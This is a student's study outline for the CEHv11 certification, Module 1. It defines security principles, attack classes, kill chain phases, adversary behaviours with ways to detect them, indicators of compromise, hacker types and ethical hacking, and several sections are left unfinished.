CEHv11 Module 1 Study Outline

Elements of Information Security (know definitions also)

Element Definition
Confidentiality Assurance that information is accessible only to
those authorized to have access
Integrity The trustworthiness of data or resources in terms
of preventing improper or unauthorized changes
Availability Assurance that the systems responsible for
delivering, storing, and processing information
are accessible when required by the authorized
users
Authenticity Refers to the characteristic of a communication,
document, or any data that ensures the quality of
being genuine
Non-Repudiation A guarantee that the send of a message cannot
later deny having sent the message and that the
recipient cannot deny having received the
message.

Attack Formula

Attacks = motive(goal) + method + Vulnerability

Classification of Attacks

Attack Definition
Passive attacks Passive attacks do not tamper with the data and involve intercepting
and Monitoring network traffic and data flow on the target network.
(Sniffing and eavesdropping)
Active attacks Active attacks tamper with the data in transit or Disrupt the
communication or services between the systems to bypass or break
secured systems.
(DoS, Man In The Middle, session highjacking, SQL injection)
Close in attacks Close-in attacks are performed when the attacker is in close physical
proximity with the target systems or network in order to gather,
modify, or disrupt access to information.
(Eavesdropping, shoulder surfing, and dumpster diving)
Insider attacks Insider attacks involve using privileged access to violate rules or
intentionally cause a threat to the organization’s information or
information systems.
(Theft of physical devices and planting keyloggers, backdoors, and
malware)
Distribution attacks Distribution attacks occur when attackers tamper with hardware or
software prior to installation.
(Attackers tamper with the hardware or software at its source or in-
transit)
Information Warfare

Definition: Use of information and communication technologies (ICT) to gain competitive advantages
over and opponent.

Cyber Kill Chain Methodology

Kill Chain Phase What Happens

Reconnaissance Gather data on the target to probe for weak points
Weaponization Create deliverable malicious payload using an exploit and a
backdoor
Delivery Send weaponized bundle to the victim using email, USB, etc.
Exploitation Exploit a vulnerability by executing code on the victim’s system
Installation Install malware on the target system
Command and Control Create a command and control channel to communicate and pass
data back and forth
Actions and Objectives Perform actions to achieve intended objectives/goals

Tactics, Techniques, and Procedure (TTPs) – Patterns of activities and methods associated with specific
threat actors or groups of threat actors.

Tactics Guidelines that describe the way an attacker performs the attack from the
beginning to the end. This guideline consists of the various tactics for information
gathering to perform initial exploitation, privilege escalation, and lateral
movement, and to deploy measures for persistent access to the system and other
purposes.
Techniques “Techniques” are the technical methods used by an attacker to achieve
intermediate results during the attack. These techniques include initial exploitation,
setting up and maintaining command and control channels, accessing the target
infrastructure, coving the tracks of data exfiltration, and others.
Procedures “Procedures” are organizational approaches that threat actors follow to launch an
attack. The number of actions usually differs depending on the objectives of the
procedure and threat actor group.

Adversary Behaviors

Behavior What Happens

Internal Reconnaissance Inside the target network, the adversary uses various techniques and
methods to carry out internal reconnaissance. Techniques and method
types include (enumeration of systems/hosts/processes, the execution of
various commands to find out information such as local user context and
system configuration/Hostname/IP addresses/active remote
systems/programs running on target systems.) You can monitor the
activities of an adversary by checking for unusual commands executed in
 the Batch Scripts and PowerShell and by using packet capturing tools.
Use of PowerShell Adversary uses PowerShell as a tool for automating data exfiltration and
launching further attacks. To identify PowerShell misuse, you can check
PowerShell’s transcript logs or Windows Event logs. (The User Agent
String and IP Addresses can be used to identify malicious hosts who try
to exfiltrate data.)
Unspecified Proxy Activities Adversary creates and configures multiple domains pointing to the same
host, allowing the adversary to switch quickly between domains to avoid
detection. By checking data feeds that are generated by the adversary
domains, you can use the data feeds to find any malicious files
downloaded and the unsolicited communication with the outside
network based on the domains.
Use of Command-Line Interface On gaining access to the target system, an adversary can make use of the
command-line interface to interact with the target system, browse the
files, read file content, modify file content, create new accounts, connect
to the remote system, and download and install malicious code. You can
identify this behavior of an adversary by checking the logs for process ID,
processes having arbitrary letters and numbers, and malicious files
downloaded from the internet.
HTTP User Agent In HTTP-based communication, the server identifies the connected HTTP
client using the user agent field. An adversary modifies the content of
the HTTP user agent field to communicate with the compromised system
and to carry further attacks. You can identify this attack at the initial
stage by checking the content of the user agent field.
Command and Control Server Adversaries use command and control servers to communicate remotely
with compromised systems through an encrypted session. Using this
encrypted channel, the adversary can steal data, delete data, and launch
further attacks. You can detect compromised hosts or network traffic for
outbound connection attempts, unwanted open ports, and other
anomalies.
Use of DNS Tunneling Adversaries use DNS tunneling to obfuscate malicious traffic in the
legitimate traffic carried by common protocols used in the network.
Using DNS tunneling, an adversary can also communicate with the
command and control server, bypass security controls, and perform data
exfiltration. You can identify DNS tunneling by analyzing malicious DNS
requests, DNS payload, unspecified domains, and the destination of DNS
requests.
Use of Web Shell An adversary uses a web shell to manipulate the web server by creating a
shell within a website; it allows an adversary to gain remote access to the
functionalities of a server. Using a web shell, an adversary performs
various tasks such as data exfiltration, file transfers, and file uploads. You
can identify the web shell running in the network by analyzing server
access, error logs, suspicious strings that indicate encoding, user agent
strings, and through other methods.
Data Staging After Successful penetration of the target’s network, the adversary uses
data staging techniques to collect and combine as much data as possible.
Once collected, the adversary can either exfiltrate or destroy the data.
 You can detect data staging by monitoring network traffic for malicious
file transfers, file integrity monitoring, and event logs. Types of data
collected (sensitive data about employees and customers, the business
tactics of the org., financial information, and network infrastructure
information.)

Indicators of Compromise

Definition: The clues, artifacts, and pieces of forensic data that are found on a network or operation
system of an organization that indicate a potential intrusion or malicious activity in the organization’s
infrastructure.

Categories of Indicators of Compromise

Category Definition
Email Indicators Attackers usually prefer email services to send malicious data to the
target Org. or individual. Suck socially engineered emails are preferred
due to their ease of use and comparative anonymity. Examples of email
indicators include the sender’s email address, email subject and
attachments or links.
Network Indicators Network indicators are useful for command and control, malware
delivery, and identifying details about the operating system, browser
type, and other computer-specific information. Examples of network
include URLs, domain names, and IP addresses.
Host-based Indicators Host-based indicators are found by performing an analysis of the infected
system within the org. network. Examples of the host-based indicators
include filenames, file hashes, registry keys, DLLs, and mutex.
Behavioral Indicators Typical IoCs are useful for identifying indications of intrusion, such as
malicious IP addresses, virus signatures, MD5 hash, and domain names.
Behavioral IoCs are used to identify specific behavior related to malicious
activities such as code injection into the memory or running scripts of an
application. Well-defined behaviors enable broad protection to block all
current and future malicious activities. These are useful to identify when
legitimate system servers are used for abnormal or unexpected activities.
Examples include document executing PowerShell script, and remote
command execution.

Hacking

Definition: Refers to exploiting the system vulnerabilities and compromising security controls to gain
unauthorized or in appropriate access to system resources. It involves a modifying system or application
features to achieve a goal outside its creator’s intended purpose. Hacking can be done to steal, pilfer, or
redistribute intellectual property, leading to business loss. Hacking on computer networks is generally
done using scripts or other network programming. Network hacking techniques include creating viruses
and worms, performing denial-of-service(DoS) attacks, establishing unauthorized remote access
connections to a device using Trojans or backdoors, creating botnets, packet sniffing, phishing, and
password cracking. The motives behind hacking could be to steal critical information or services, for
thrill intellectual challenge, curiosity, experiment, knowledge financial gain, prestige, power, peer
recognition, vengeance and vindictiveness, among other reasons.

Describe a hacker

A hacker is an intelligent person with excellent computer skills, along with the ability to create and
explore the computer’s software and hardware. They break into a system or network without
authorization to destroy, steal sensitive data, or perform malicious attacks. Usually, a hacker is a skilled
engineer or a programmer with subject expertise and enough knowledge to discover vulnerabilities in a
target system. For some hackers, hacking is a hobby to see how many computers or networks they can
compromise, and tend enjoy learning the details of various programming languages and computer
systems to gain knowledge or to do illegal things. Some hack with malicious intent behind their
escapades, like stealing business data, credit card information, social security numbers, and email
passwords.

_____________________________________________________________________________________

Hacker Classes

Hacker Class Definition

Black hat Individuals who use their extraordinary computing skills for illegal
or malicious purposes. They are often involved in criminal
activities. Also known as “Crackers”
White hats Also called penetration testers, are individuals who use their
hacking skills for defensive purposes. Almost every organization
has security analysts who are knowledgeable about hacking
countermeasures, which can secure its network and information
systems against malicious attacks. They have permission from the
system owner.
Gray hats Individuals who work both offensively and defensively at various
times. They might help hackers to find various vulnerabilities in a
system or network and, at the same time, help vendors to improve
products (software or hardware) by limitations and making more
secure.
Suicide Hackers Individuals who aim to bring down critical infrastructure for a
“cause” and are not worried about facing jail terms or any other
kind of punishment. Suicide hackers are similar to suicide bombers
who sacrifice their life an attack and are thus not concerned with
the consequences of their actions.
Script Kiddies Unskilled hackers who compromise systems by running scripts,
tools, and software developed by real hackers. They usually focus
on the quantity of the attacks that they initiate. They do not have a
specific target or goal in performing the attack and simply aim to
gain popularity or prover their technical skills.
Cyber Terrorists Individuals with a wide range of skills, motivated by religious or
political beliefs, to create fear of large-scale disruption of computer
networks.
State-Sponsored Hackers Highly skilled individuals having expertise in hacking and are
 employed by the government to penetrate, gain top-secret
information from, and damage the information systems of other
government or military orgs. The main aim of these threat actors is
to detect vulnerabilities in and exploit a nation’s infrastructure and
gather intelligence or sensitive information.
Hacktivist A form of activism in which hackers break into government or
corporate computer systems as an act of protest. They use hacking
to increase awareness of their social or political agendas, as well as
to boost their own reputations in both online and offline arenas.
Hacker Teams A consortium of skilled hackers having their own resources and
funding. They work together in synergy for researching state-of-
the-art technologies. These threat actors can also detect
vulnerabilities, develop advanced tools, and execute attacks with
proper planning.
Industrial Spies Individuals who perform corporate espionage by illegally spying on
competitor orgs. They focus on stealing critical information such as
blueprints, formulas, product designs, and trade secrets. These
threat actors use advanced persistent threats (APTs) to penetrate a
network and can also stay undetected for years. In some cases,
they may use social engineering techniques to steal sensitive
information such as development plans and marketing strategies of
the target company, which can result in financial loss to that
company.
Insider Any employee(trusted person) who has access to critical assests of
the org. An insider threat involves the use of privileged access to
violate rules or intentionally cause harm to the org’s information or
information systems. They can easily bypass security rules, corrupt
valuable resources, and access sensitive information. Generally
disgruntled employees, terminated employees, and undertrained
staff members.
Criminal Syndicates Groups of individuals or communities that are involved in
organized, planned, and prolonged criminal activities. They exploit
victims from distinct jurisdictions on the internet, making them
difficult to locate. The goal of these actors is to illegally embezzle
money by performing sophisticated cyber-attacks and money-
laundering activities.
Organized Hacker A group of hackers working together in criminal activities. Such
groups are well organized in a hierarchical structure consisting of
leaders and workers. The group can have multiple layers of
management. These hackers are miscreants or hardened criminals
who do not use their own devices; rather, they use rented devices
or botnets and crimeware services to perform various cyber-
attacks to pilfer money from victims and sell their information to
the highest bidder. They can also swindle intellectual property,
trade secrets, and marketing plans; covertly penetrate the target
network; and remain undetected for long periods.
Hacking Phases

Phase What happens

Mitre or kill chain?

Ethical Hacking

Definition: The practice of employing computer and network skills in order to assist orgs. In testing their
network security for possible loopholes and vulnerabilities. White Hats = Ethical Hackers. Orgs hire
White Hats to assist them in enhancing their cybersecurity. They hack in ethical ways, with the
permission of the network or system owner and without the intention to cause harm. They report all
vulnerabilities to the system and network owner for remediation, thereby increasing the security of an
org’s information system. Ethical hacking involves the use of hacking tools, tricks, and techniques
typically used by an attacker to verify the existence of exploitable vulnerabilities in a system’s security.

List some reasons why Ethical Hacking is Necessary

Refer to slide
To prevent hackers from gaining access to the org’s information systems
To uncover vulnerabilities in systems and explore their potential as security risk
To analyze and strengthen an org’s security posture, including policies, network protection
infrastructure, and end-user practices.
To provide adequate preventive measures in order to avoid security breaches.
To help safeguard customer data
To enhance security awareness at all levels in a business.
?
?

Scope of Ethical Hacking

Ethical hacking is crucial component of risk assessment, auditing, counter fraud and information
systems security best practices.
It is used to identify risks and highlight remedial actions, it also reduces Information and
Communication Technology (ICT) costs by resolving vulnerabilities.

Limitations of Ethical Hacking

Unless the businesses already know what they are looking for and why they are hiring an outside
vendor to hack systems in the first place. Chances are there would not be much to gain from the
experience.
An ethical hacker can only help the organization to better understand its security system; it is up to
 the organization to place the right safeguards on the network.

Ethical Hacker Skills

Technical Non-Technical
In-depth knowledge of major operating The ability to learn and adopt new technologies
environments such as Windows, Unix, Linux, and quickly
Macintosh
In-depth knowledge of networking concepts, Strong work ethics and good problem solving and
technologies, and related hardware and software communication skills
A computer expert adept at technical domains Committed to the organization’s security policies
Knowledgeable about security areas and related An awareness of local standards and laws
issues
“High technical” Knowledge for launching
sophisticated attacks

Information Security Controls

Term Definition
IA (Information Assurance) The assurance that the integrity, availability confidentiality, and
authenticity of information and information systems is protected
during the usage, processing, storage, and transmission of
information. Accomplished through physical, technical, and
administrative controls.
Defense in Depth A security strategy in which several protection layers are placed
throughout an information system. It helps to prevent direct
attacks against the system and its data because a break in one
layer only lead the attacker to the next layer.
Risk The degree of uncertainty or expectation that an adverse event
may cause damage to the system. Risks are categorized into
different levels according to their estimated impact on the
system. Risk matrix is used to scale risk by considering the
probability, likelihood, and consequence or impact of the risk.
Risk relation = Risk= Threats x Vulnerabilities x Impact
Event Impact =Risk= Threats x Vulnerabilities x Asset Value.
Risk Management The process of identifying, assessing, responding to, and
implementing the activities that control how the org. manages
the potential effect of risk. A continuous and ever-increasing
complex process in the security life cycle. Used to reduce and
maintain risk at an acceptable level utilizing a well-defined and
actively employed security program.
Cyber Threat Intelligence
Threat Modeling
Incident Management
Incident Handling and Response
AI

Definition: _________________________________________________________________________

ML

Definition: ____________________________________________________________________________

How do AI & ML Prevent Cyber Attacks

Information Security Laws

Law Industry What law does